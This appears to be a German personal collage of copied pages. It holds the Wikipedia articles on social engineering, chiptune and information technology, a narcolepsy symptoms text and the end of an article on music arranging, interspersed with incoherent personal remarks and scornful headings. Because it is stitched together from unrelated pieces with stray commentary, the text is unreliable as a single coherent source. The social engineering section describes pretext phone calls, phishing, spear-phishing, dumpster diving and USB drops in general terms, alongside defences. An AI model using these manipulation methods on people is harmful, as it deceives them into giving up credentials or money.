Paul Wiebe: Bläser arrangieren. Wizoobooks Verlag, 2007, ISBN 978-3-934903-61-6.
Achim Brochhausen: Arrangement Pop/Jazz/Rock. audio-workshop Fachskript, Leseprobe (PDF; 447 kB)
Paul Wiebe: Streicher arrangieren. Wizoobooks Verlag, 2009, ISBN 978-3-934903-70-8 – Wege zum perfekten Orchestersatz am Computer.
Andreas N. Tarkmann: Arrangieren für Kammermusikensembles. Staccato-Verlag, Düsseldorf 2010, ISBN 978-3-932976-34-6.
Einzelnachweise
A. A. Schmieder: Werkintegrität und Freiheit der Interpretation. In: NJW. 1990, 1945, 1947
Sebastian Schunke: Das Bearbeitungsrecht in der Musik und dessen Wahrnehmung durch die GEMA. 2008, S. 63
Wieland Ziegenrücker, Peter Wicke: Sachlexikon Popularmusik. 1987, S. 25
Tibor Kneif: Sachlexikon Rockmusik. 1978, S. 25.
Wolf Moser: Das Repertoire aus zweiter Hand. Die Geschichte der Übertragung und ihrer Aufgaben. In: Gitarre & Laute, 9, 1987, 3, S. 19–26; hier: S. 19 (zu Adaption, Arrangement und Bearbeitung)
Renate Stephan: Johann Strauß, der Walzerkönig. 1999, S. 46
Jürgen Wölfer: Lexikon des Jazz. 1993, S. 28.
Richard Lawn: Experiencing Jazz. 2013, S. 127
Paul E. Rinzler: Jazz Arranging and Performance Practice. 1999, S. 60 f.
Richard Lawn: Experiencing Jazz, 2013, S. 36 f.
Fred Bronson: The Billboard Book of Number One Hits. 1985, S. 74
Peter Keller, Markus Fritsch: Arrangieren und Produzieren. 1995, S. 45
Jürgen Wölfer: Lexikon des Jazz, 1993, S. 212.
Hans-Jürgen Homann: Praxishandbuch Musikrecht. 2006, S. 63
BGH GRUR 1991, 533, 535 Brown Girl II
BGH GRUR 1981, 267, 268 – Dirlada
Hans-Jürgen Homann: Praxishandbuch Musikrecht. 2006, S. 19
Artikel verbessern
Neuen Artikel anlegen
Autorenportal
Hilfe
Letzte Änderungen
Kontakt
Spenden
Werkzeuge
Links auf diese Seite
Änderungen an verlinkten Seiten
Spezialseiten
Permanenter Link
Seiteninformationen
Wikidata-Datenobjekt
Artikel zitieren
In anderen Projekten
Commons
Drucken/exportieren
Buch erstellen
Als PDF herunterladen
Druckversion
In anderen Sprachen
English
Español
Français
Hrvatski
Italiano
Nederlands
Polski
Русский
Türkçe
Links bearbeiten
Diese Seite wurde zuletzt am 16. Juli 2019 um 14:30 Uhr bearbeitet.
Abrufstatistik · Autoren
Mono & Nikitaman - Stell Dir vor es ist Krieg - Und keiner geht hin...
Wikipedia schreibt Scheissdreck über Social Engineering. (Computer Hacker-Kunst)
Social Engineering [ˈsəʊʃl̩ ˌɛndʒɪˈnɪəɹɪŋ] (engl. eigentlich „angewandte Sozialwissenschaft“, auch „soziale Manipulation“) nennt man zwischenmenschliche Beeinflussungen mit dem Ziel, bei Personen bestimmte Verhaltensweisen hervorzurufen, sie zum Beispiel zur Preisgabe von vertraulichen Informationen, zum Kauf eines Produktes oder zur Freigabe von Finanzmitteln zu bewegen.
Social Engineers spionieren das persönliche Umfeld ihres Opfers aus, täuschen Identitäten vor oder nutzen Verhaltensweisen wie Autoritätshörigkeit aus, um geheime Informationen oder unbezahlte Dienstleistungen zu erlangen. Häufig dient Social Engineering dem Eindringen in ein fremdes Computersystem, um vertrauliche Daten einzusehen; man spricht dann auch von Social Hacking ['hækɪŋ].
Inhaltsverzeichnis
1 Geschichte
2 Grundmuster
3 Weitere mögliche Formen
3.1 Phishing
3.2 Dumpster Diving
3.3 USB Drop
4 Abwehr
5 Bekannte Social Engineers
6 Siehe auch
7 Literatur
8 Weblinks
9 Einzelnachweise
Geschichte
Eine frühe Form des Social Engineering wurde in den 1980er Jahren mit Phreaking praktiziert. Phreaker riefen unter anderem bei Telefongesellschaften an, gaben sich als Systemadministrator aus und baten um neue Passwörter, mit denen sie schließlich kostenlose Modemverbindungen herstellten.
Grundmuster
Das Grundmuster des Social Engineering zeigt sich bei fingierten Telefonanrufen: Der Social Engineer ruft Mitarbeiter eines Unternehmens an und gibt sich als Techniker aus, der vertrauliche Zugangsdaten benötigt, um wichtige Arbeiten abzuschließen. Bereits im Vorfeld hat er aus öffentlich zugänglichen Quellen oder vorangegangenen Telefonaten kleine Informationsfetzen über Verfahrensweisen, tägliches Bürogerede und Unternehmenshierarchie zusammengetragen, die ihm bei der zwischenmenschlichen Manipulation helfen, sich als Insider des Unternehmens auszugeben. Zusätzlich verwirrt er sein technisch ungebildetes Opfer mit Fachjargon, baut mit Smalltalk über scheinbar gemeinsame Kollegen Sympathie auf und nutzt Autoritätsrespekt aus, indem er droht, bei vom Opfer unterlassener Kooperation dessen Vorgesetzten stören zu müssen. Unter Umständen hat der Social Engineer bereits im Vorfeld Informationen gesammelt, dass ein bestimmter Mitarbeiter sogar wirklich technische Hilfe angefordert hat und bereits tatsächlich einen derartigen Anruf erwartet.
Trotz ihrer scheinbaren Banalität gelingen mit der Methode immer wieder spektakuläre Datendiebstähle. So gelang es einem amerikanischen Schüler 2015, den privaten E-Mail-Account des damaligen CIA-Direktors Brennan zu öffnen und drei Tage lang darauf zuzugreifen.[1][2]
Beim automatisierten Social Engineering, auch Scareware genannt, kommen spezielle Schadprogramme zum Einsatz, die den Nutzer verängstigen und so zu bestimmten Handlungen bewegen sollen.[3]
Weitere mögliche Formen
Phishing
→ Hauptartikel: Phishing
Eine bekannte Variante des Social Engineering ist das Phishing. Bei dieser unpersönlichen Variante werden fingierte E-Mails mit vertrauenserweckender Aufmachung an die potentiellen Opfer versendet. Inhalt dieser Nachrichten kann zum Beispiel sein, dass ein bestimmter Dienst, den man nutzt, eine neue URL hat und man sich auf dieser von nun an einloggen soll, wenn man ihn in Anspruch nehmen will. Bei dieser fingierten Seite handelt es sich, von Layout und Aufmachung her, um eine Kopie der originalen Webseite des Serviceanbieters. Dies soll dazu beitragen, das Opfer in Sicherheit zu wiegen. Fällt man darauf herein, so gelangen Kriminelle in den Besitz des Loginnamens und -passworts. Eine weitere Möglichkeit besteht darin, dass das Opfer von einem vermeintlichen Administrator dazu aufgefordert wird, die Logindaten als Antwort zurückzusenden, da angeblich technische Probleme vorliegen. Das Grundmuster ist ähnlich dem fingierten Telefonanruf, denn auch hier gibt sich der Social Engineer in der Regel als technischer Mitarbeiter aus, der zur Datenüberprüfung oder -wiederherstellung die Geheiminformation benötigt. Anders als dort verfügt der Angreifer hier meist über nicht viel mehr als die E-Mail-Adresse des Empfängers, was die Attacke weniger persönlich und damit auch weniger wirkungsvoll macht.
Effizienter ist das Spear-Phishing (abgeleitet von der englischen Übersetzung des Begriffs Speer), worunter ein gezielter Angriff zu verstehen ist. Hierbei beschafft sich der Angreifer z. B. über die Studentenvertretung einer Hochschule die Mailadressen der dort eingeschriebenen Studenten, um an diese gezielt eine Phishing-Mail einer lokal ansässigen Bank oder Sparkasse zu übersenden. Die „Trefferquote“ bei dieser Art von Phishing-Attacken ist höher als bei normalen Angriffen, da die Wahrscheinlichkeit, dass ein Student seine Bankverbindung bei diesem Institut unterhält, sehr groß ist.
Dumpster Diving
Hierbei wird der Müll des Opfers durchwühlt und nach Hinweisen und Anhaltspunkten über das soziale Umfeld gesucht. Diese können dann in einem darauf folgenden Anruf dazu verwendet werden, um das Vertrauen des Opfers zu erschleichen.
USB Drop
Die Sicherheitsfirma Kaspersky Lab deckte auf, dass eine unbekannte Hackergruppe seit 2001 rund 500 Firmen mit USB Drops angegriffen hatte. Dabei erhielten zufällige Mitarbeiter infizierte USB-Sticks, deren Verwendung ihren PC infizierte und den Hackern Zugriff auf das interne Netzwerk der Firma gewährte.[4] Eine Möglichkeit für Angreifer ist es, die infizierten USB-Sticks vor dem Firmengelände als Werbegeschenk zu verteilen.[5]
Abwehr
Die Abwehr von Social Engineering ist nicht einfach zu bewerkstelligen, da der Angreifer im Grunde positive menschliche Eigenschaften ausnutzt: Den Wunsch etwa, in Notsituationen unbürokratisch zu helfen oder auf Hilfe mit Gegenhilfe zu reagieren. Generelles Misstrauen zu schüren, würde auch die Effektivität und die vertrauensvolle Zusammenarbeit in Organisationen negativ beeinflussen. Den wichtigsten Beitrag zur Bekämpfung von Social Engineering liefert deshalb im konkreten Fall das Opfer selbst, indem es Identität und Berechtigung eines Ansprechenden zweifellos sicherstellt, bevor es weitere Handlungen vornimmt. Bereits die Rückfrage nach Name und Telefonnummer des Anrufers oder dem Befinden eines nicht existierenden Kollegen kann schlecht informierte Angreifer enttarnen. Höflich um Geduld zu bitten, wenn eine heikle Anfrage auch noch so dringend vorgetragen wird, sollte deshalb gezielt trainiert werden. Auch scheinbar geringfügige und nutzlose Informationen sollten Unbekannten nicht offengelegt werden, denn sie könnten in folgenden Kontaktaufnahmen zum Aushorchen anderer missbraucht werden oder zusammen mit vielen anderen für sich genommen nutzlosen Angaben zum Abgrenzen eines größeren Sachverhalts dienen. Wichtig ist eine schnelle Warnung aller potenziellen weiteren Opfer; erste Ansprechpartner sind die Sicherheitsabteilung des Unternehmens, die Kontaktadresse des E-Mail-Providers und Mitmenschen und Institutionen, deren Angaben zur Vorspiegelung falscher Tatsachen missbraucht wurden. Folgende Punkte sollten unbedingt beachtet werden:
Ist die Identität des Absenders einer E-Mail nicht sicher, sollte man stets misstrauisch sein.
Bei Anrufen sollten auch scheinbar unwichtige Daten nicht sorglos an Unbekannte weitergegeben werden, da diese die so erhaltenen Informationen für weitere Angriffe nutzen können.
Bei Antworten auf eine E-Mail-Anfrage sollten unter keinen Umständen persönliche oder finanzielle Daten preisgegeben werden, egal von wem die Nachricht zu kommen scheint.
Keine Links aus E-Mails verwenden, die persönliche Daten als Eingabe verlangen. Stattdessen die URL selbst im Browser eingeben.
Bei Unklarheit über die Echtheit des Absenders diesen nochmals telefonisch kontaktieren, um die Authentizität der E-Mail zu überprüfen.
Der US-Sicherheitsspezialist Bruce Schneier zweifelt angesichts der Komplexität und der möglichen Nebenwirkungen von präventiven Maßnahmen gegen Social Engineering sogar generell an deren Wert und schlägt stattdessen Strategien vor, die auf Schadensbegrenzung und schnelles Recovery bauen.[6]
Schulungen der Mitarbeiter sind zwar notwendig, aber nur begrenzt hilfreich, wie Studien an der US-Militärakademie West Point gezeigt haben.[7] Im Vorfeld können sogenannte Social-Engineering-Penetrationstests durchgeführt werden.
Bekannte Social Engineers
Öffentlich bekannt wurde die Methode vor allem durch den Hacker Kevin Mitnick, der durch seine Einbrüche in fremde Computer eine der meistgesuchten Personen der Vereinigten Staaten war. Mitnick selbst meinte, Social Engineering sei die bei weitem effektivste Methode, um an ein Passwort zu gelangen, und schlage rein technische Ansätze in Sachen Geschwindigkeit um Längen.
Bekannt wurde 2010 der US-IT-Experte Thomas Ryan mit seiner Kunstfigur Robin Sage. Die virtuelle Internetschönheit stellte über soziale Netzwerke Kontakte zu Militärs, Industriellen und Politikern her und entlockte ihnen vertrauliche Informationen. Ryan ging nach einem Monat mit den Ergebnissen des Experiments an die Öffentlichkeit, um vor allzu großer Vertrauensseligkeit in sozialen Netzwerken zu warnen.[8]
Der für die Computersicherheit tätige Hacker Archangel zeigte in der Vergangenheit, dass Social Engineering nicht nur bei der Offenlegung von Passwörtern wirksam ist, sondern auch bei der illegalen Beschaffung von Pizzen, Flugtickets und sogar Autos funktioniert.
Weitere bekannte Social Engineers sind der Scheckbetrüger Frank Abagnale, Miguel Peñalver, David „Race“ Bannon, der sich als Interpol-Agent ausgab, der Grundstücksbetrüger Peter Foster, der Hochstapler Steven Jay Russell und der Hochstapler Gert Postel, der mit einem weiteren Hochstapler, Reiner Pfeiffer, eine Rolle in der Barschel-Affäre gespielt hat.
Siehe auch
Rubber-hose cryptanalysis
Literatur
Uwe Baumann, Klaus Schimmer, Andreas Fendel: SAP Pocketseminar. „Faktor Mensch – Die Kunst des Hackens oder warum Firewalls nichts nützen“. SAP 2005, Fibel (Memento vom 9. August 2012 im Internet Archive) (PDF; 363 kB).
Michael Lardschneider: Social Engineering. Eine ungewöhnliche aber höchst effiziente Security Awareness Maßnahme. In: Datenschutz und Datensicherheit. DuD. 9, 2008 (ISSN 1614-0702 print), S. 574–578.
Kevin D. Mitnick, William L. Simon: Die Kunst der Täuschung. Risikofaktor Mensch. (Nachdruck der 1. Auflage). mitp, Heidelberg 2006, ISBN 3-8266-1569-7 (Originalausgabe: The Art of Deception. Controlling the Human Element of Security. Wiley, Indianapolis IN 2002, ISBN 0-471-23712-4 (englisch)).
Kevin D. Mitnick, William L. Simon: Die Kunst des Einbruchs. Risikofaktor IT. mitp, Heidelberg 2006, ISBN 3-8266-1622-7.
Klaus Schimmer: Wenn der Hacker zweimal fragt! Wie bereite ich meine Mitarbeiter auf Social Engineering Angriffe vor? In: Datenschutz und Datensicherheit. DuD. 9, 2008, S. 569–573.
Bettina Weßelmann: Maßnahmen gegen Social Engineering: Training muss Awareness-Maßnahmen ergänzen. In: Datenschutz und Datensicherheit. DuD. 9, 2008, S. 601–604.
Stefan Schumacher: Die Psychologischen Grundlagen des Social-Engineering. In: Proceedings. GUUG Frühjahrsfachgespräches 2009, 10.–13. März 2009, Hochschule Karlsruhe. GUUG, München 2009, ISBN 978-3-86541-322-2, S. 77–98 (UpTimes 1, 2009).
Stefan Schumacher: Psychologische Grundlagen des Social Engineering. In: Die Datenschleuder. 94, 2010, ISSN 0930-1054, S. 52–59, online (PDF; 8,9 MB).
Christopher Hadnagy: Social Engineering – The Art of Human Hacking. Wiley, Indianapolis IN 2010, ISBN 978-0-470-63953-5 (englisch)
Weblinks
sicherheitskultur.at
computec.ch freie deutschsprachige Dokumente
social-engineer.org englischsprachige Dokumente und Wiki
Englischsprachige Praxisbeispiele
Social Engineering Zusammenfassung (PDF; 91 kB) über die Grundlagen von Social Engineering und Gegenmaßnahmen (deutsch)
Johannes Wiele: Social Engineering erkennen. In: LANline, über Möglichkeiten, als Opfer eine Social-Engineering-Attacke zu erkennen
Einzelnachweise
Neue Zürcher Zeitung: Teenager will privates E-Mail-Konto von CIA-Chef geknackt haben vom 20. Oktober 2015, abgerufen am 20. Oktober 2015
Wired: Teen Who Hacked CIA Director’s Email Tells How He Did It vom 19. Oktober 2015, abgerufen am 20. Oktober 2015.
(„Wie der Datendieb verlauten ließ, will er die Zugangsdaten zu Brennans E-Mail-Konto mittels Social Engineering erhalten haben: Er hat offenbar Mitarbeiter von Verizon dazu gebracht, Daten von Brennan herauszugeben.“)
Social Engineering: Sicherheitslücke Mensch. 1und1.de/digitalguide. Abgerufen am 14. September 2017.
Mirjam Hauck: Schwachstelle Mensch. In: sueddeutsche.de. 17. Februar 2015, ISSN 0174-4917 (sueddeutsche.de [abgerufen am 15. November 2017]).
Mirjam Hauck: Schwachstelle Mensch. In: sueddeutsche.de. 17. Februar 2015, ISSN 0174-4917 (sueddeutsche.de [abgerufen am 15. November 2017]).
Johannes Wiele: Nachsorge ist besser als Vorsicht. Bruce Schneier im Gespräch mit Wissenschaftlern. In: LANline 3/2008 (ISSN 0942-4172).
Technology Review: Die neuen Waffen der Phisher. heise.de
Ein kurzes, heißes Leben. In: sueddeutsche.de, 2. August 2010
Kategorien:
Hackertechnik (Computersicherheit)IT-SicherheitSozialpsychologiePhishing <br>
=>Die können ja noch nicht mal "Seele" richtig Deutsch ausschreiben.
Mein Arbeits Artefakt: ...
Toy Story gafällt mir von der Auflösung bzw. mal etwas ohne Rauschen.
Ansonsten würde ich dringend auf YouTube (zbsp. mit Beauty) gegen Drogen vorgehen.
Musik Stile wie Drum & Bass sollten nicht mit Drogenkonsum besetzt werden.
Außerdem wäre ein Punktesystem für Altersklassen in Bezug auf die Startseiten sehr gut.
Narkolepsie
Artikelinhalt
Narkolepsie (Schlafkrankheit)
Symptome der Narkolepsie
Narkolepsie Symptome werden in der Regel anhand vier verschiedener Haupt-Symptome unterschieden. Diese vier zentralen Narkolepsie Symptome werden zudem als Symptom Komplex oder als narkoleptische Tetrade benannt. Diese vier Symptome der Schlafkrankheit sind Schlafzwang, Kataplexien, abnormer Schlafrhythmus sowie Schlaflähmung.
Narkolepsie Symptom Nr. 1: Schlafzwang
Die Schlafkrankheit (im Volksmund auch als Schlummerzwang bezeichnet) äußert sich zunächst oft nur durch eine ganztägig bestehende, erhöhte Schläfrigkeit. Hinzu können die imperativen Schlafattacken kommen.
Die Müdigkeit steigert sich und es treten Konzentrationsschwächen auf, falls sich der Narkolepsie-Patient zum Wachbleiben zwingt. Meist treten die Schlafattacken oder die unwiderstehliche Müdigkeit in Situationen auf, in denen auch gesunde Menschen schläfrig werden, so etwa als Beifahrer, im Dämmerlicht (auch bei öffentlichen Veranstaltungen wie im Kino oder Theater), beim Lesen und Fernsehen, bei Vortragsveranstaltungen oder bei monotonen Arbeiten.
Hinzu schlafen Narkoleptiker auch plötzlich ungewollt ein, wenn andere Menschen, etwa durch Aufregung, hellwach sind – zum Beispiel während sie selbst einen Vortrag halten.
Narkolepsie Symptom Nr. 2: Kataplexie
Neben der Tagesschläfrigkeit kommt es bei einem Teil der Narkolepsie-Patienten mehr oder weniger häufig zu plötzlichen und kurzen Verlusten der Kontrolle über die Muskeln, die als Kataplexien bezeichnet werden.
Bei leichten Kataplexien kann nur die Gesichtsmuskulatur erschlaffen, schwere Anfälle lassen den gesamten Körper zusammensacken, was auf Außenstehende meist sehr dramatisch wirkt. Ausgelöst werden können Kataplexien beispielsweise durch starke Gefühle wie Lachen (man spricht in diesem Zusammenhang auch vom sogenannten Lachschlag), Angst, Ärger oder Überraschung. So können einem zum Beispiel die Knie weich werden, wenn jemand einen guten Witz erzählt.
Der Narkolepsie-Patient ist während einer Kataplexie bei vollem Bewusstsein, kann aber unter Umständen die Augenlieder nicht öffnen. Seine Sinne funktionieren völlig normal, auch haben Betroffene im Gegensatz zu Epileptikern noch die Kontrolle über ihre Ausscheidungsfunktionen. Eine Kataplexie kann bis zu einer halben Stunde andauern und durch den Zusammenhang mit emotionalen Zuständen noch verlängert werden, etwa wenn derjenige sich darüber ärgert, dass er die Kataplexie nicht beenden kann.
Auch Erinnerungen an Emotionen können Kataplexien auslösen. Kataplexie gilt als sicheres Symptom für Narkolepsie, was eine Diagnose wesentlich erleichtert und andere Schlafstörungen ausschließt.
Narkolepsie Symptom Nr. 3: Abnormer Schlafrhythmus
Der abnorme Schlafrhythmus kann sich etwa in einem Zyklus von je vier Stunden Schlaf und Wachsein abwechselt. Dieser Rhythmus setzt sich auch nachts fort, weshalb Narkolepsie-Betroffene unter teils lang anhaltenden Nacht-Wach-Phasen leiden. Zwar wachen auch gesunde Menschen nachts auf, doch schläft man in der Regel gleich wieder ein. Sind die Nacht-Wach-Phasen eines Narkoleptikers nur kurz, so ist sein Schlaf trotzdem äußerst seicht.
Jegliche äußere Einflüsse, wie Licht, Lärm oder Bewegung (etwa wenn sich der Partner im selben Bett umdreht) lassen den Narkolepsie-Patienten aufwachen. Zudem sind die Traumphasen gestört; Betroffene erinnern sich durch den leichten Schlaf häufiger an ihre Träume und neigen verstärkt zu (teilweise in der nächsten Schlafphase fortgesetzten) Alpträumen. Der leichte Schlaf bei Narkolepsie ist nicht erholsam und verstärkt das Schlafbedürfnis und die Konzentrationsschwächen am Tag.
Narkolepsie Symptom Nr. 4: Schlaflähmung
Schlaflähmung ist ähnlich wie die Katalepsie ein Zustand, bei dem der Betroffene die Kontrolle über seine Muskeln verliert. Die Schlaflähmung tritt in den Übergangsphasen beim Einschlafen oder Aufwachen ein, manche beschreiben Schlaflähmung als einen Zustand zwischen Wachsein und Träumen. Anders als bei der Kataplexie steht die Schlaflähmung nicht im Zusammenhang mit Emotionen. Ein weiterer Unterschied ist, dass Außenstehende den Bewegungsunfähigen durch Berührung aus der Starre erlösen können.
Im Gegensatz zu den oben beschriebenen Narkolepsie-Symptomen wird die Schlafparalyse nicht von allen Patienten als einheitlich negativ empfunden. Manche Narkoleptiker beschreiben den Zustand als angenehm oder können sich währenddessen besser ungelöster Probleme annehmen. Unangenehm wird die Schlaflähmung besonders, wenn sie in einer unbequemen Haltung eintritt. Sie kann jedoch äußerst belastend sein, wenn gleichzeitig schlafbezogene Halluzinationen auftreten.
Diese werden oft als die am meisten psychisch belastenden Symptome der Narkolepsie empfunden, da der Betroffene Erscheinungen hat, die auf ihn vollkommen real wirken. Selbst nach dem Aufstehen können Narkoleptiker davon überzeugt bleiben, dass ein Einbrecher an ihrem Bett stand oder sie vergewaltigt wurden.
Mehr zum Thema: https://www.gesundheit.de/krankheiten/gehirn-und-nerven/schlafstoerungen/narkolepsie-symptome
Ohne MOS nichts los
Chiptune
Zur Navigation springen
Zur Suche springen
Ein 6581er und ein 8580er SID-Chip des Commodore C64
Chiptunes bilden ein Genre innerhalb der computererstellten Musik, das sich durch einen charakteristischen künstlichen Klang auszeichnet. Der Ursprung liegt in der Heimcomputer- und Telespiele-Ära.
Die ursprünglichen Chiptunes wurden durch Soundchips mit relativ primitiven Tongeneratoren erzeugt. Hierbei konnten in Echtzeit 3 bis 4 Töne parallel erzeugt werden. Gegenüber dem primitivsten elektronischen Tongenerator, der nur einen sinusförmigen Piepton erzeugt, konnten diese Soundchips bereits die Wellenform unterschiedlich beeinflussen und zudem Rauschen erzeugen. Das Ergebnis klingt so klar erkennbar künstlich, auch wenn sich eine Art von unterschiedlichen unnatürlichen Musikinstrumenten reininterpretieren lässt.
Ein verwandtes Genre ist der Bitpop.
Inhaltsverzeichnis
1 Geschichte
2 Komposition
3 Literatur
4 Weblinks
Geschichte
Der Begriff Chiptune stammt aus der Ära des Heimcomputers Amiga, der mit seinem Dateiformat Mod Musikern bereits die Möglichkeit bot, mit Samples zu arbeiten und ihnen damit größere Freiheiten hinsichtlich des Klangs verschaffte. Dies ging trotz erheblicher technischer Einschränkungen in Richtung moderner Synthesizer, die natürliche Musikinstrumente täuschend echt imitieren können. Verwendete ein Musiker weiterhin die Tongeneratoren der damaligen Soundchips konventionell, oder klang das Ergebnis zumindest so, wurde sein Werk als „Chiptune“ bezeichnet, um es von der moderneren Sampling-Musik abzugrenzen.
Chiptunes weisen normalerweise eine geringe Datenmenge auf, sehr ähnlich dem MID-Dateiformat basierend auf MIDI, und fanden deshalb oft Verwendung in Intros aus der Demoszene- sowie Cracktros von Releasegroups aus der Warez-Szene, bei denen es nötig ist, möglichst wenig Speicherplatz zu belegen.
Echte Chiptunes stehen heute noch in einer Nische außerhalb von Techno, Elektropop, Industrial u. a., erinnern aber oft an diese Genres. Auch gegenüber Klingeltönen grenzt sich die Szene ab und möchte nicht damit in Verbindung gebracht werden. Der Anspruch, die Musik mit modernen Trackern aus Sprachsamples und Effekten zu gestalten, geht weit darüber hinaus. Einige „Chiptuner“ sehen im Techno bzw. in der Techno-Welle der 1990er nur einen Ableger ihrer Arbeit, eine Inflationierung ihres früheren Werks und die Degenerierung der ursprünglichen Chiptunes für den Massengeschmack, obgleich sich einige auch erfolgreich dort wiedergefunden haben.
Komposition
Charakteristisch für Chiptunes ist das seltene Vorkommen von tatsächlich mehrstimmigen Akkorden im klassischen Sinn. Bei Chiptunes werden Akkorde normalerweise über Arpeggios gebildet, um Tonspuren einzusparen. Diese Einschränkung basiert darauf, dass die ersten Soundchips selten mehr als drei Tonkanäle parallel abspielen konnten – das Spielen eines Akkords hätte häufig alle verfügbaren Kanäle belegt.
Aufgrund dieser „Stimmenknappheit“ besitzen viele Chiptunes einen sehr komplexen Aufbau. Um mehr als nur drei Instrumente erklingen zu lassen, werden die Lücken in einer Melodie, beispielsweise der des Basses, genutzt, um dort ein anderes Instrument oder eine Begleitstimme erklingen zu lassen. Somit befinden sich auf einem Kanal zwei oder mehr Melodien oder Stimmen. Diese Technik bietet sich dafür an, Rhythmen mit vielen vorgezogenen Elementen zu verwenden. Im Bereich der SID-Tunes hat sich so ein sehr funkiger Stil entwickelt.
Eine weitere Technik, um mehr Stimmen einzubauen, findet sich oft auf dem Kanal, wo Bass und die Schlaginstrumente zu hören sind. Vor die einzelnen Basstöne wird für den Bruchteil einer Sekunde ein Rauschen gesetzt. Dies erzeugt den Eindruck einer Art Hi-Hat eines Schlagzeugs. Durch die Aufhebung der Kanalbegrenzung moderner Tracker gibt es für Komponisten heute jedoch weitgehend keine technische Einschränkungen mehr.
Literatur
Nils Dittbrenner: Soundchip-Musik. Osnabrück: epOs-Music 2007, ISBN 978-3-923486-94-6
Julia Mihály: low tech music for high tech people. In: MusikTexte 155, 2017, ISSN 0178-8884
Weblinks
Commons: Chiptune – Sammlung von Bildern, Videos und Audiodateien
Audio-Datei / Hörbeispiel Hörbeispiel: Ein für den Nintendo-Entertainment-System-Soundchip generierter klassischer Chiptune?/i
Interview von Radio Unerhört Marburg mit dem Micromusic-Headquarter Berlin über micromusic.net und Chipmusik im Allgemeinen
Chiptune Online Player: Amiga, C64, AtariST, Mod
Gesprochene Wikipedia Dieser Artikel ist als Audiodatei verfügbar:
0:00
Speichern | Informationen | 07:06 min (3,3 MB) Text der gesprochenen Version (22. November 2014)
Mehr Informationen zur gesprochenen Wikipedia
Kategorien:
Wikipedia:Gesprochener ArtikelStil der elektronischen MusikComputerspielmusik
Der Schrott Mama-Strahlung
Chris Hülsbeck
Informationstechnik
Zur Navigation springen
Zur Suche springen
Informationstechnik (kurz IT, häufig englische Aussprache [aɪ tiː]) ist ein Oberbegriff für die Informations- und Datenverarbeitung auf Basis dafür bereitgestellter technischer Services und Funktionen. Diese werden auf einer dahinterliegenden technischen IT-Infrastruktur bereitgestellt. Es spielt dabei keine Rolle, ob die Services- und Funktionen als auch die technische IT-Infrastruktur physisch vor Ort oder virtuell oder über Netzwerke bereitgestellt werden. (Informationstechnisches System).
Eigentlich versteht man unter dem Begriff speziell elektronische Informationstechnik (EIT), zur Informationstechnik gehören auch nicht-elektronische Systeme (wie die anfangs rein elektrische Telefonie und Telegraphie). Der eigentliche Fachbegriff ist aber (elektronische) Informations- und Datenverarbeitung (EID), der die anfangs getrennten Technologien der Kommunikationsmedien (‚Information‘ im ursprünglichen Sinne der Mitteilung) und der Datenverarbeitung im engeren Sinne (von Akten, Zahlenreihen und ähnlichem, EDV) zusammenfasst. Da die beiden Begriffe Information und Daten heute in der Praxis inhaltlich weitgehend verschmolzen sind, wie auch Technik und Verarbeitung nicht zu trennen sind, wird der Ausdruck „IT“ für den gesamten technologischen Sektor verwendet.
Die Ausdrücke Informationstechnik und Informationstechnologie können – im nichtwissenschaftlichen Bereich – als synonym angesehen werden: Unter „Technik“ versteht man üblicherweise allenfalls speziell die konkrete praktische Umsetzung (Anwendung), unter „Technologie“ die Forschung und Entwicklung und die theoretischen Grundlagen. In dem hochinnovativen Sektor wie auch bei Software ist das kaum trennbar.
Als zeitgemäße Veranschaulichung zur Einordnung der IT in übergeordnete Systeme eignet sich eine Betrachtung im 3-Ebenen-Modell. Sie zeigt verbundene technische Systeme und deren Nutzen für einzelne User oder für Prozesse in Organisationen:[1]
IT-3-Ebenen-Modell: Prozesse der Informationsverarbeitung und der Informationstechnik auf drei Ebenen dargestellt: 1. User und Prozesse 2. IT-Funktionen (Services) 3. IT-Infrastruktur
Übersicht der Prozesse der Informationsverarbeitung und der Informationstechnik in einem schematisch vereinfachten 3-Ebenen-Modell der IT
IT-User und IT-basierte Organisationsprozesse
IT-Funktionen: Services und Applikationen / Portale und Betriebssysteme
IT-Infrastruktur(en) als technische Basis
Eine andere Sicht auf die IT, die Sicht der durch die IT angebotenen Dienste, bietet das Konzept SOA (Serviceorientierte Architektur).
Inhaltsverzeichnis
1 Bedeutung
2 Wachstum der weltweiten Kapazität der Informationstechnik
3 Gebiete
4 Lehrberuf in Österreich
5 Literatur
6 Weblinks
7 Einzelnachweise
Bedeutung
Die Informationstechnik stellt ein Bindeglied zwischen der klassischen Elektrotechnik und der Informatik dar. Das wird z. B. dadurch ersichtlich, dass sich viele elektrotechnische Fakultäten von Hochschulen und Abteilungen höherer Schulen (z. B. Höhere Technische Lehranstalten, HTLs) in „Informationstechnik“ oder zumindest in „Elektrotechnik und Informationstechnik“ bzw. „Informationstechnologie“ umbenennen.
Der Informationstechnik nahe ist die Technische Informatik, die sich unter anderem mit Schaltnetzen und -werken sowie dem Aufbau und der Organisation von Computern beschäftigt. Aber auch die (Hardware-)Aspekte der Ausgabe- und Eingabegeräte, also klassische und zukünftige Mensch-Maschine-Schnittstellen (Human-Computer Interfaces), gehören in diesen Bereich.
Digitale Signalverarbeitung und Kommunikationstechnik sind wiederum Grundlage für Rechnernetze. Das Zusammenwachsen von Informationstechnik, Telekommunikation und Unterhaltungselektronik wird daher auch oft als Informations- und Kommunikationstechnik (IuK) oder Informations- und Telekommunikationstechnik (ITK) bezeichnet.
Entwicklungen der IT haben in den letzten Jahrzehnten viele Lebensbereiche verändert, so neben der Wirtschaft auch die Wissenschaft. Hierbei ist auch die Erforschung und Entwicklung der Mensch-Computer-Interaktion zunehmend relevant geworden.
Wachstum der weltweiten Kapazität der Informationstechnik
Das Wachstum der globalen Kapazität der Digitaltechnik wurde in drei unterscheidbaren Gruppen quantifiziert:
Die wachsende Kapazität, Information durch den Raum zu übertragen (Kommunikation);
die Kapazität, Information durch die Zeit zu übermitteln (Speicherung); und
die Kapazität, mit Information zu rechnen (Informatik):[2]
Die effektive Kapazität der Weltinformationen durch das (bidirektionale) Telekommunikationsnetz betrug 280 (optimal komprimierte) Petabyte 1986, und 20 % davon wurden in digitalen Netzwerken übertragen. Im Jahr 2007 wuchs diese weltweite Kapazität auf 65 (optimal komprimierte) Exabyte, wobei 99,9 % der übermittelten Information in digitalen Bits übertragen wurden. Dies ist eine jährliche Wachstumsrate von 30 % und fünfmal so schnell wie das weltweite Wirtschaftswachstum.[3]
